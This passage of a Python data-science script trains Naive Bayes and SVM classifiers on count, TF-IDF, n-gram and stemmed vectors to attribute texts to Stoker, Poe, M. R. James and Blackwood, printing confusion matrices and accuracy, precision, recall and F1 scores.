extract_topn_from_vector(allbookVocab_STEM, \n sort_coo(allbookDTM_STEM[0].tocoo()),500)))\nplot_wordcloud(words_only, 'all', 450)\n\n\n###------------------------------ Initial Analysis before Data Manipulation -------------------------\n# books per author\nnum_stokerBooks = len(stokerDF)\nnum_poeBooks = len(poeDF)\nnum_jamesBooks = len(jamesDF)\nnum_blackwoodBooks = len(blackwoodDF)\n\nnum_book_list =[num_blackwoodBooks, num_poeBooks, num_stokerBooks, num_jamesBooks]\n# build a dataframe \nbookFreqDF = []\nbookFreqDF = pd.DataFrame(columns = ['book_author', 'num_books'])\n\nindex = 0\nfor auth in author_dict:\n df_row = {'book_author': author_dict.get(auth),\n 'num_books': num_book_list[index]}\n # append the row to the bookDF\n bookFreqDF = bookFreqDF.append(df_row, ignore_index = True)\n index = index + 1\n\n# plot with seaborn \nfg = sns.catplot(x = \"book_author\", y = \"num_books\", hue = \"book_author\", dodge=False,\n height = 3, aspect = 3, palette=\"Spectral\", kind=\"bar\", data=bookFreqDF)\nfg.set_xticklabels(rotation=45, horizontalalignment = 'right', \n fontweight = 'light', fontsize = 'medium')\nfg.set(xlabel = \"Author\", ylabel = \"Number of Works by this Author\", \n title = \"Frequency of Works by Each Author\")\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\nlast_index = len(allbookLabel)\npredict_index = 65\n\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF = tempDF.iloc[0:predict_index]\npredictLabelVectorDF = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF)\nlen(predictLabel)\nlen(predictLabelVectorDF)\n\n# separate vectorDF\ntempDF = allbookVectorDF.copy()\n# recreate all the book and predict DFs\nbookVectorDF = tempDF.iloc[0:predict_index]\npredictVectorDF = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF)\nlen(predictVectorDF)\n\n# for STEM\n# predicted books are 65:end in the index\n# remove them from the set\nlast_index = len(allbookLabel)\npredict_index = 65\n\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_STEM.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_STEM = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_STEM = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_STEM)\nlen(predictLabel)\nlen(predictLabelVectorDF_STEM)\n\n# separate vectorDF\ntempDF = allbookVectorDF_STEM.copy()\n# recreate all the book and predict DFs\nbookVectorDF_STEM = tempDF.iloc[0:predict_index]\npredictVectorDF_STEM = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_STEM)\nlen(predictVectorDF_STEM)\n\n# this will need to be repeated when new vectorization is done\n\n#-------------------------------- Vectorization (binary) for Bernoulli--------------------------------\n# for the rest of the vectorization - only doing the full book set (all 4 authors)\n# and prediction set\n# pass in our own stopwords\nallbookCV_b = CountVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english',\n binary = 'True')\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_b = allbookCV_b.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_b = allbookCV_b.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_b = pd.DataFrame(allbookDTM_b.toarray(), columns = allbookVocab_b)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nallbookLabelVectorDF_b = allbookVectorDF_b.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - BINARY for BernoulliNB\nallbookLabelVectorDF_b.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_b.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_b = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_b = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_b)\nlen(predictLabelVectorDF_b)\n\n# separate vectorDF\ntempDF = allbookVectorDF_b.copy()\n# recreate all the book and predict DFs\nbookVectorDF_b = tempDF.iloc[0:predict_index]\npredictVectorDF_b = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_b)\nlen(predictVectorDF_b)\n\n#-------------------------------- Vectorization with TFIDF --------------------------------\n# for the rest of the vectorization - only doing the full book set (all 4 authors)\n# and prediction set\nallbookCV_TF = TfidfVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english')\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_TF = allbookCV_TF.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_TF = allbookCV_TF.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_TF = pd.DataFrame(allbookDTM_TF.toarray(), columns = allbookVocab_TF)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nallbookLabelVectorDF_TF = allbookVectorDF_TF.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *TFIDFVectorizer* vector TFIDF\nallbookLabelVectorDF_TF.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_TF.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_TF = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_TF = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_TF)\nlen(predictLabelVectorDF_TF)\n\n# separate vectorDF\ntempDF = allbookVectorDF_TF.copy()\n# recreate all the book and predict DFs\nbookVectorDF_TF = tempDF.iloc[0:predict_index]\npredictVectorDF_TF = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_TF)\nlen(predictVectorDF_TF)\n\n#-------------------- Vectorization for ngrams (bi-grams) for MultinomialNB ---------------------\n# ** NOTE: this is using non-stemmed data **\n# Create an instance of CountVectorizer (one for the corpus)\n# this should use both unigrams and bigrams, but I will also do bigrams and trigrams\n# now that we have good, clean data\nallbookCV_ub = CountVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english',\n ngram_range = (1,2))\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_ub = allbookCV_ub.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_ub = allbookCV_ub.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_ub = pd.DataFrame(allbookDTM_ub.toarray(), columns = allbookVocab_ub)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nallbookLabelVectorDF_ub = allbookVectorDF_ub.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - no Binary, no TFIDF\nallbookLabelVectorDF_ub.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_ub.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_ub = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_ub = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_ub)\nlen(predictLabelVectorDF_ub)\n\n# separate vectorDF\ntempDF = allbookVectorDF_ub.copy()\n# recreate all the book and predict DFs\nbookVectorDF_ub = tempDF.iloc[0:predict_index]\npredictVectorDF_ub = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_ub)\nlen(predictVectorDF_ub)\n\n#----------- Vectorization for ngrams (bi-grams and tri-grams) for MultinomialNB ---------------\n# ** NOTE: this is using non-stemmed data **\n# Create an instance of CountVectorizer (one for the corpus)\n# this should use both unigrams and bigrams, but I will also do bigrams and trigrams\n# now that we have good, clean data\nallbookCV_bt = CountVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english',\n ngram_range = (2,3))\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_bt = allbookCV_bt.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_bt = allbookCV_bt.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_bt = pd.DataFrame(allbookDTM_bt.toarray(), columns = allbookVocab_bt)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nallbookLabelVectorDF_bt = allbookVectorDF_bt.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - no Binary, no TFIDF\nallbookLabelVectorDF_bt.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_bt.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_bt = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_bt = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_bt)\nlen(predictLabelVectorDF_bt)\n\n# separate vectorDF\ntempDF = allbookVectorDF_bt.copy()\n# recreate all the book and predict DFs\nbookVectorDF_bt = tempDF.iloc[0:predict_index]\npredictVectorDF_bt = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_bt)\nlen(predictVectorDF_bt)\n\n#------------------------------- Confusion Matrix Pretty Plotter -----------------------\n# use some code (used this in our project too)\n# to define a function to draw a pretty confusion matrix\n# found this at https://scikit-learn.org/0.23/auto_examples/model_selection/plot_confusion_matrix.html\nimport itertools\ndef my_plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.viridis_r):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n np.set_printoptions(precision=3)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=0)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], '.3f'),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n \n#------------------------------------ Training and Test sets for Modeling -------------------\n# create training and testing vars\n# for Author with CountVectorizer Vectors\ntsize = 0.25\nXbook_train, Xbook_test, ybook_train, ybook_test = train_test_split(bookVectorDF, \n bookLabelArray, \n test_size=tsize)\n## create training and testing vars\n# for Author with CountVectorizer Bernulli Vectors\nXbook_train_b, Xbook_test_b, ybook_train_b, ybook_test_b = train_test_split(bookVectorDF_b, \n bookLabelArray, \n test_size=tsize)\n# create training and testing vars\n# for Author with TFIDF Vectors\nXbook_train_TF, Xbook_test_TF, ybook_train_TF, ybook_test_TF = train_test_split(bookVectorDF_TF, \n bookLabelArray, \n test_size=tsize)\n# these are only used with MultiNomialNB and not elsewhere\n# create training and testing vars\n# for Author with CountVectorizer uni,bigrams\nXbook_train_ub, Xbook_test_ub, ybook_train_ub, ybook_test_ub = train_test_split(bookVectorDF_ub, \n bookLabelArray, \n test_size=tsize)\n## create training and testing vars\n# for Author with CountVectorizer bi,trigrams Vectors\nXbook_train_bt, Xbook_test_bt, ybook_train_bt, ybook_test_bt = train_test_split(bookVectorDF_bt, \n bookLabelArray, \n test_size=tsize)\n\n## create training and testing vars\n# for Author with CountVectorizer STEMMED Vectors\nXbook_train_STEM, Xbook_test_STEM, ybook_train_STEM, ybook_test_STEM = train_test_split(bookVectorDF_STEM, \n bookLabelArray, \n test_size=tsize)\n\n# no need to set up test/training for predicting sets - they will be used as *test* sets in their \n# entirity - to see if they map to a particular one of the 4 original authors\n\n#------------------------------------------Multinomial Naive Bayes ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB= MultinomialNB()\n# Run for different items\nbookNB = myNB.fit(Xbook_train, ybook_train)\nbookPredict = myNB.predict(Xbook_test)\nprint(np.round(myNB.predict_proba(Xbook_test),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM = confusion_matrix(ybook_test, bookPredict)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM)\n\n# scores\nbookNB.score(Xbook_train, ybook_train)\nbookNB.score(Xbook_test, ybook_test)\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookPredict)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookPredict, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookPredict, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookPredict, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test, bookPredict, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookPredict, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookPredict, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookPredict))\n\n\n#--------------------------------- STEMMED Multinomial Naive Bayes ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB_STEM = MultinomialNB()\n# Run for different items\nbookNB_STEM = myNB_STEM.fit(Xbook_train_STEM, ybook_train_STEM)\nbookPredict_STEM = myNB_STEM.predict(Xbook_test_STEM)\nprint(np.round(myNB_STEM.predict_proba(Xbook_test_STEM),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM_STEM = confusion_matrix(ybook_test_STEM, bookPredict_STEM)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM_STEM)\n\n# scores\nbookNB_STEM.score(Xbook_train_STEM, ybook_train_STEM)\nbookNB_STEM.score(Xbook_test_STEM, ybook_test_STEM)\n# Accuracy - test set\nAS = accuracy_score(ybook_test_STEM, bookPredict_STEM)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_STEM, bookPredict_STEM, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_STEM, bookPredict_STEM, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_STEM, bookPredict_STEM))\n\n\n#------------------------------------------- Bernoulli Classifier -------------------------------------\n# create the Naive Bayes Multinomial classifier (model)\nmyB_NB= BernoulliNB()\n# Run for different items\nbookB_NB = myB_NB.fit(Xbook_train_b, ybook_train_b)\nbookPredictB = myB_NB.predict(Xbook_test_b)\nprint(np.round(myB_NB.predict_proba(Xbook_test_b),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabelB_CM = confusion_matrix(ybook_test_b, bookPredictB)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabelB_CM)\n\n# scores\nbookB_NB.score(Xbook_train_b, ybook_train_b)\nbookB_NB.score(Xbook_test_b, ybook_test_b)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_b, bookPredictB)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_b, bookPredictB, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_b, bookPredictB, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_b, bookPredictB, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_b, bookPredictB, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_b, bookPredictB, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_b, bookPredictB, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_b, bookPredictB))\n\n#-------------------------------- TFIDF (with Multinomial NB) Classifier -------------------------------\n# create the Naive Bayes Multinomial classifier (model)\nmyTF_NB= BernoulliNB()\n# Run for different items\nbookTF_NB = myTF_NB.fit(Xbook_train_TF, ybook_train_TF)\nbookPredictTF = myTF_NB.predict(Xbook_test_TF)\nprint(np.round(myTF_NB.predict_proba(Xbook_test_TF),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabelTF_CM = confusion_matrix(ybook_test_TF, bookPredictTF)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabelTF_CM)\n\n# scores\nbookTF_NB.score(Xbook_train_TF, ybook_train_TF)\nbookTF_NB.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookPredictTF)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookPredictTF, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookPredictTF, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookPredictTF, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookPredictTF, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookPredictTF, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookPredictTF, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookPredictTF))\n\n#----------------------- Multinomial Naive Bayes (Unigrams and Bigrams) ---------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB = MultinomialNB()\n# Run for different items\nbookNB_ub = myNB.fit(Xbook_train_ub, ybook_train_ub)\nbookPredict_ub = myNB.predict(Xbook_test_ub)\nprint(np.round(myNB.predict_proba(Xbook_test_ub),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM_ub = confusion_matrix(ybook_test_ub, bookPredict_ub)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM_ub)\n\n# scores\nbookNB_ub.score(Xbook_train_ub, ybook_train_ub)\nbookNB_ub.score(Xbook_test_ub, ybook_test_ub)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_ub, bookPredict_ub)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_ub, bookPredict_ub, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_ub, bookPredict_ub, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_ub, bookPredict_ub))\n\n#------------------------- Multinomial Naive Bayes (Bigrams and Trigrams) ---------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB= MultinomialNB()\n# Run for different items\nbookNB_bt = myNB.fit(Xbook_train_bt, ybook_train_bt)\nbookPredict_bt = myNB.predict(Xbook_test_bt)\nprint(np.round(myNB.predict_proba(Xbook_test_bt),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM_bt = confusion_matrix(ybook_test_bt, bookPredict_bt)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM_bt)\n\n# scores\nbookNB_bt.score(Xbook_train_bt, ybook_train_bt)\nbookNB_bt.score(Xbook_test_bt, ybook_test_bt)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_bt, bookPredict_bt)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_bt, bookPredict_bt, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_bt, bookPredict_bt, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_bt, bookPredict_bt))\n\n#----------------------- Support Vector Machines ---------------------------------------------\n#---- Now do the same with SVM and 3 different kernels - with two different vectorizers ------\n#------------------------------------ SVM with Linear kernel ---------------------------------\n# with Countvectorizer\nSVM_Model=LinearSVC(C=1)\nbookSVM_Linear = SVM_Model.fit(Xbook_train, ybook_train)\nbookSVMPredict = SVM_Model.predict(Xbook_test)\n\nSVM_matrix = confusion_matrix(ybook_test, bookSVMPredict)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrix)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_Linear.score(Xbook_train, ybook_train)\nbookSVM_Linear.score(Xbook_test, ybook_test)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookSVMPredict)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookSVMPredict, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookSVMPredict, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookSVMPredict, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookSVMPredict))\n\n#-------------------------------------------------------------------------\n# with TFIDF\nbookSVM_LinearTF = SVM_Model.fit(Xbook_train_TF, ybook_train_TF)\nbookSVMPredictTF = SVM_Model.predict(Xbook_test_TF)\n\nSVM_matrixTF = confusion_matrix(ybook_test_TF, bookSVMPredictTF)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrixTF)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_LinearTF.score(Xbook_train_TF, ybook_train_TF)\nbookSVM_LinearTF.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookSVMPredictTF)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookSVMPredictTF, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookSVMPredictTF, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookSVMPredictTF))\n\n#------------------------------------ SVM with rbf kernel ----------------------------------------\n# ran with Cost = 1 - all classified as one label\n# ran again with Cost = 50, much better\nSVM_Model_rbf=svm.SVC(C=100, kernel='rbf', \n verbose=True, gamma=\"auto\")\n# with Countvectorizer\nbookSVM_rbf = SVM_Model_rbf.fit(Xbook_train, ybook_train)\nbookSVMPredict_rbf = SVM_Model_rbf.predict(Xbook_test)\n\nSVM_matrix_rbf = confusion_matrix(ybook_test, bookSVMPredict_rbf)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrix_rbf)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_rbf.score(Xbook_train, ybook_train)\nbookSVM_rbf.score(Xbook_test, ybook_test)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookSVMPredict_rbf)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookSVMPredict_rbf, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookSVMPredict_rbf, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookSVMPredict_rbf))\n\n#-------------------------------- SVM with RBF Kernel TFIDF Vectorization -----------\n# with TFIDF\n\nbookSVM_TF_rbf = SVM_Model_rbf.fit(Xbook_train_TF, ybook_train_TF)\nbookSVMPredictTF_rbf = SVM_Model_rbf.predict(Xbook_test_TF)\n\nSVM_matrixTF_rbf = confusion_matrix(ybook_test_TF, bookSVMPredictTF_rbf)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrixTF_rbf)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_TF_rbf.score(Xbook_train_TF, ybook_train_TF)\nbookSVM_TF_rbf.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookSVMPredictTF_rbf)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookSVMPredictTF_rbf, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookSVMPredictTF_rbf, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookSVMPredictTF_rbf))\n\n#------------------------------------ SVM with poly kernel ----------------------------------------\nSVM_Model_poly=svm.SVC(C=100, kernel='poly', degree=2,\n verbose=True, gamma=\"auto\")\n\n# with Countvectorizer\nbookSVM_poly = SVM_Model_poly.fit(Xbook_train, ybook_train)\nbookSVMPredict_poly = SVM_Model_poly.predict(Xbook_test)\n\nSVM_matrix_poly = confusion_matrix(ybook_test, bookSVMPredict_poly)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrix_poly)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_poly.score(Xbook_train, ybook_train)\nbookSVM_poly.score(Xbook_test, ybook_test)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookSVMPredict_poly)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookSVMPredict_poly, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookSVMPredict_poly, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookSVMPredict_poly, average=None)\nprint(\"F1 Score is \", F1)\nF1 = 